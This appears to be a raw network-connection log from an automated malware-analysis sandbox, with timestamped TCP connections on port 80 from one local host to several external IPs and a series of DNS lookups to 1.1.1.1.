                                                                  Jan 10, 2025 18:52:19.945527077 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548613071 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548717022 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:20.548785925 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:21.456414938 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.475195885 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.479990005 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:22.480071068 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.496164083 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:22.501019955 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.173947096 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.173969984 CET805002069.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:23.174021006 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:24.004914045 CET5002080192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.022638083 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.029191971 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.029308081 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.045869112 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:25.050745010 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050760984 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050785065 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050795078 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050839901 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050849915 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050972939 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050981998 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.050993919 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.680994987 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.681041956 CET805002169.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:25.681093931 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:26.550183058 CET5002180192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.568738937 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.573548079 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:27.573662996 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.583806038 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:27.588629961 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272419930 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272500038 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:28.272599936 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:28.275580883 CET5002280192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:28.280527115 CET805002269.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:33.774058104 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.778927088 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:33.779045105 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.795064926 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:33.799875975 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654228926 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654453993 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654525042 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:34.654560089 CET8050023170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:34.654613018 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:35.300237894 CET5002380192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.319056034 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.323879004 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:36.323976994 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.339319944 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:36.344166040 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.262958050 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266720057 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266758919 CET8050024170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:37.266815901 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:37.266865015 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:37.847012997 CET5002480192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.866056919 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.870953083 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.871098042 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.887358904 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:38.892240047 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892255068 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892288923 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892298937 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892379045 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892390013 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892440081 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892450094 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:38.892458916 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.931550026 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932400942 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932431936 CET8050025170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:39.932449102 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:39.932485104 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:40.396538973 CET5002580192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.413851023 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.418723106 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:41.418878078 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.428215027 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:41.434099913 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.296263933 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.297291994 CET8050026170.33.13.246192.168.2.4
                                                                  Jan 10, 2025 18:52:42.297375917 CET5002680192.168.2.4170.33.13.246
                                                                  Jan 10, 2025 18:52:42.297384977 CET8050026170.33.13.246192.168.2.4
Jan 10, 2025 18:52:42.297431946 CET | 50026 | 80 | 192.168.2.4 | 170.33.13.246
Jan 10, 2025 18:52:42.300631046 CET | 50026 | 80 | 192.168.2.4 | 170.33.13.246
Jan 10, 2025 18:52:42.305412054 CET | 80 | 50026 | 170.33.13.246 | 192.168.2.4
Jan 10, 2025 18:52:47.342681885 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:47.347654104 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:47.347791910 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:47.362998962 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:47.367784023 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:48.100738049 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:48.100764036 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:48.100775003 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:48.100838900 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:48.101201057 CET | 80 | 50027 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:48.101254940 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:48.916904926 CET | 50027 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:49.944180012 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:49.948998928 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:49.952147007 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:49.967571020 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:49.972400904 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:50.700732946 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:50.700750113 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:50.700761080 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:50.700862885 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:50.701518059 CET | 80 | 50028 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:50.702694893 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:51.471927881 CET | 50028 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:52.491247892 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:52.495992899 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.496212959 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:52.512552023 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:52.517390013 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517414093 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517431021 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517479897 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517555952 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517565966 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517649889 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517659903 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:52.517684937 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.207634926 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.207662106 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.207673073 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.207684040 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.207751989 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:53.208043098 CET | 80 | 50029 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:53.208096027 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:54.018949986 CET | 50029 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.037642956 CET | 50030 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.042520046 CET | 80 | 50030 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:55.042642117 CET | 50030 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.052181005 CET | 50030 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.056972980 CET | 80 | 50030 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:55.759372950 CET | 80 | 50030 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:55.762459040 CET | 80 | 50030 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:52:55.762639999 CET | 50030 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.764707088 CET | 50030 | 80 | 192.168.2.4 | 66.235.200.145
Jan 10, 2025 18:52:55.769510031 CET | 80 | 50030 | 66.235.200.145 | 192.168.2.4
Jan 10, 2025 18:53:01.144524097 CET | 50031 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:01.150376081 CET | 80 | 50031 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:01.150511026 CET | 50031 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:01.192965984 CET | 50031 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:01.197808981 CET | 80 | 50031 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:02.706419945 CET | 50031 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:02.711529970 CET | 80 | 50031 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:02.711622000 CET | 50031 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:03.769733906 CET | 50032 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:03.774507046 CET | 80 | 50032 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:03.774584055 CET | 50032 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:03.855757952 CET | 50032 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:03.860583067 CET | 80 | 50032 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:05.362912893 CET | 50032 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:05.367989063 CET | 80 | 50032 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:05.368249893 CET | 50032 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:06.381764889 CET | 50033 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:06.386668921 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.386759043 CET | 50033 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:06.404608011 CET | 50033 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:06.409467936 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409481049 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409562111 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409571886 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409584999 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409627914 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409637928 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409713030 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:06.409723043 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:07.909570932 CET | 50033 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:07.914678097 CET | 80 | 50033 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:07.914769888 CET | 50033 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:08.929079056 CET | 50034 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:08.933892012 CET | 80 | 50034 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:08.934024096 CET | 50034 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:08.944063902 CET | 50034 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:08.948893070 CET | 80 | 50034 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:09.657424927 CET | 80 | 50034 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:09.657516003 CET | 80 | 50034 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:09.657661915 CET | 50034 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:09.661027908 CET | 50034 | 80 | 192.168.2.4 | 85.159.66.93
Jan 10, 2025 18:53:09.665842056 CET | 80 | 50034 | 85.159.66.93 | 192.168.2.4
Jan 10, 2025 18:53:14.714395046 CET | 50035 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:14.719185114 CET | 80 | 50035 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:14.719260931 CET | 50035 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:14.735112906 CET | 50035 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:14.740570068 CET | 80 | 50035 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:15.725756884 CET | 80 | 50035 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:15.725908041 CET | 80 | 50035 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:15.725954056 CET | 50035 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:16.237699986 CET | 50035 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:17.256340027 CET | 50036 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:17.261271954 CET | 80 | 50036 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:17.261425018 CET | 50036 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:17.276911974 CET | 50036 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:17.281723022 CET | 80 | 50036 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:18.300914049 CET | 80 | 50036 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:18.300945044 CET | 80 | 50036 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:18.301031113 CET | 50036 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:18.784666061 CET | 50036 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:19.804874897 CET | 50037 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:19.809758902 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.809878111 CET | 50037 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:19.826001883 CET | 50037 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:19.831002951 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831017017 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831028938 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831041098 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831120014 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831130981 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831142902 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831152916 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:19.831166029 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:21.086890936 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:21.087193966 CET | 80 | 50037 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:21.087236881 CET | 50037 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:21.331423044 CET | 50037 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:22.350086927 CET | 50038 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:22.355083942 CET | 80 | 50038 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:22.355282068 CET | 50038 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:22.369898081 CET | 50038 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:22.375777006 CET | 80 | 50038 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:23.350660086 CET | 80 | 50038 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:23.350687981 CET | 80 | 50038 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:23.350863934 CET | 50038 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:23.353784084 CET | 50038 | 80 | 192.168.2.4 | 156.253.8.115
Jan 10, 2025 18:53:23.358608961 CET | 80 | 50038 | 156.253.8.115 | 192.168.2.4
Jan 10, 2025 18:53:28.409370899 CET | 50039 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:28.414545059 CET | 80 | 50039 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:28.416186094 CET | 50039 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:28.435842037 CET | 50039 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:28.441359043 CET | 80 | 50039 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:29.024465084 CET | 80 | 50039 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:29.024555922 CET | 80 | 50039 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:29.024785995 CET | 50039 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:29.941018105 CET | 50039 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:30.959846020 CET | 50040 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:30.964898109 CET | 80 | 50040 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:30.964982986 CET | 50040 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:30.980751991 CET | 50040 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:30.985658884 CET | 80 | 50040 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:32.487730026 CET | 50040 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:32.535240889 CET | 80 | 50040 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.506854057 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:33.511797905 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.511876106 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:33.527383089 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:33.532322884 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532334089 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532346010 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532429934 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532453060 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532461882 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532517910 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532527924 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:33.532537937 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:34.086782932 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:34.086812019 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:34.086864948 CET | 80 | 50041 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:34.086977005 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:34.091233969 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:34.350085020 CET | 80 | 50040 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:34.351193905 CET | 50040 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:35.039612055 CET | 50041 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:36.053725958 CET | 50042 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:36.058588982 CET | 80 | 50042 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:36.058660030 CET | 50042 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:36.068082094 CET | 50042 | 80 | 192.168.2.4 | 13.248.169.48
Jan 10, 2025 18:53:36.073472977 CET | 80 | 50042 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:39.659254074 CET | 80 | 50042 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:39.659476042 CET | 80 | 50042 | 13.248.169.48 | 192.168.2.4
Jan 10, 2025 18:53:39.659574032 CET | 50042 | 80 | 192.168.2.4 | 13.248.169.48
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 18:51:08.750119925 CET | 64710 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:51:08.949014902 CET | 53 | 64710 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:51:24.618014097 CET | 51503 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:51:25.185996056 CET | 53 | 51503 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:51:38.636116982 CET | 55436 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:51:39.009188890 CET | 53 | 55436 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:51:52.538244963 CET | 55846 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:51:52.602622986 CET | 53 | 55846 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:52:05.757311106 CET | 55578 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:52:06.198546886 CET | 53 | 55578 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:52:19.833429098 CET | 65532 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:52:19.844885111 CET | 53 | 65532 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:52:33.293876886 CET | 60661 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:52:33.771558046 CET | 53 | 60661 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:52:47.319438934 CET | 58009 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:52:47.340240955 CET | 53 | 58009 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:53:00.788393974 CET | 56542 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:53:01.123945951 CET | 53 | 56542 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:53:14.679178953 CET | 64454 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:53:14.711869001 CET | 53 | 64454 | 1.1.1.1 | 192.168.2.4
Jan 10, 2025 18:53:28.366616964 CET | 63006 | 53 | 192.168.2.4 | 1.1.1.1
Jan 10, 2025 18:53:28.406824112 CET | 53 | 63006 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
